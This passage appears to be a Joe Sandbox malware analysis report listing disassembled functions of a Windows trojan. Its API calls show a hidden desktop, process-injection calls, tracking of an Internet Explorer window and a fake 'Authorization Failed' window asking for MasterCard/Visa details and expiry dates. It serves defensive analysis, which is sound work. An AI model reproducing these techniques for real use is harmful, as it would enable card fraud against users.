                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 0042B884 Relevance: 28.1, Strings: 20, Instructions: 3073COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "%s"$"%s"$"%s"$"POS$"edi$"edi$"edi$"sub$"sub$%i]$%i] $'%s%$'%s'$'%s'$'%s'$'%s'$''>$''>$A$A
                            • API String ID: 0-792900420
                            • Opcode ID: 44a1de5bb6308ec8297fddabfebab828391f15ae462822a30ca388360e9e3fc0
                            • Instruction ID: 591e24e94baa5eb777a4e5272106f1456da37870eb4cc5cdaf26395a7f99a22d
                            • Opcode Fuzzy Hash: 44a1de5bb6308ec8297fddabfebab828391f15ae462822a30ca388360e9e3fc0
                            • Instruction Fuzzy Hash: 43B224A264D7E41ECB178B306BEA15A7F71AA2331079D41CFC4C18B5B3D24C9A46D39E
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040129C Relevance: 4.6, APIs: 3, Instructions: 62fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012CB
                            • ReadFile.KERNEL32(00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012F7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleRead
                            • String ID:
                            • API String ID: 1035965006-0
                            • Opcode ID: 47f2dca901cbdc1a66e3f3583fad0d6114902e6408f1b023f1e58de9c319e094
                            • Instruction ID: 9417908700fea3c6c2d518f569e6258f54968d851d27fbd2fc3a7524409ea189
                            • Opcode Fuzzy Hash: 47f2dca901cbdc1a66e3f3583fad0d6114902e6408f1b023f1e58de9c319e094
                            • Instruction Fuzzy Hash: 6301F972B4031467F66061B99C42FEA62DC9B40718F250573BA04F71E1D4F8F94145E9
                            Function 0040129B Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012CB
                            • ReadFile.KERNEL32(00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012F7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00014C08,?,00000000,00408020,80000000,00000000,00000000,?,00000000,00000000), ref: 004012FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleRead
                            • String ID:
                            • API String ID: 1035965006-0
                            • Opcode ID: a7034a66a97c2ad48dbde2790ce3c97ab3afce793421e3091bb9c8eae5f15450
                            • Instruction ID: 63f29cc0c8a63db554c35ce2faa1ceedf18d1a6f23da356bd246b66c6c3c2b62
                            • Opcode Fuzzy Hash: a7034a66a97c2ad48dbde2790ce3c97ab3afce793421e3091bb9c8eae5f15450
                            • Instruction Fuzzy Hash: 4DE04F22B8434036E120117A5C82F6955955B81B6CF39067BF251FA5E2D0E8A9064159
                            Function 00403AC7 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            Strings
                            • browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources , xrefs: 00403B62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources
                            • API String ID: 0-4076998654
                            • Opcode ID: 71e30e22ed7aa17d5eb5796dfda6b7e5a97b13d87a54357e884cfde78ccb44a7
                            • Instruction ID: 40709d4487810cc1922a5993d5805e7f605537f13211522c88bb602fbf3c41e4
                            • Opcode Fuzzy Hash: 71e30e22ed7aa17d5eb5796dfda6b7e5a97b13d87a54357e884cfde78ccb44a7
                            • Instruction Fuzzy Hash: D411845AFCE1100AC7299C312855A76E9B9C363366F6EB5BA5441F3382CA38CD0A814C
                            Function 004039CE Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                            Download Yara Rule
                            Strings
                            • browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources , xrefs: 00403A22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: browser window. THE ADDITIONA L TERMS CONTA IN A BINDING ARBITRA TION CLA USE A NDSoftware Assurance.into Order Management from other sources
                            • API String ID: 0-4076998654
                            • Opcode ID: b39da473612083b458953393f7e89ebb2f0e779550c5cde06b9b03474c2cca4d
                            • Instruction ID: d5233873f3df390e9927d326a7b197e4f088e0b608a775f8c8ee362fb12e3d34
                            • Opcode Fuzzy Hash: b39da473612083b458953393f7e89ebb2f0e779550c5cde06b9b03474c2cca4d
                            • Instruction Fuzzy Hash: 85F0E559F9F204078B198C702481A77D87CC727366F65747A9492F7797DA28CD0A840D
                            Function 00403A6B Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58f3c8a1f9e1281dbdf0148f17ab67f2c4c2117c77419a047376376c9843a203
                            • Instruction ID: 369b517bdf9b4a7eefb07a6653478fd64adda63123773171253af608eda399e9
                            • Opcode Fuzzy Hash: 58f3c8a1f9e1281dbdf0148f17ab67f2c4c2117c77419a047376376c9843a203
                            • Instruction Fuzzy Hash: DDE0BF22E9A1004BC7148E71D485A35F67CD767312F24F0758045B7252C334D906991C
                            Function 0042E00C Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b19ef757a3db7c08c54adf90fa78ded45087a2f29c5cc2a90648ea44554c268
                            • Instruction ID: 44b393219971a2e47edc40146be2bcda873f62d5454f9e9f1d1b61fb4f38130d
                            • Opcode Fuzzy Hash: 6b19ef757a3db7c08c54adf90fa78ded45087a2f29c5cc2a90648ea44554c268
                            • Instruction Fuzzy Hash: 9DE04622E9A2108FC7048E61C885A31F6B8D76B311F28F0B5C006BB262C3B8D847992C
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
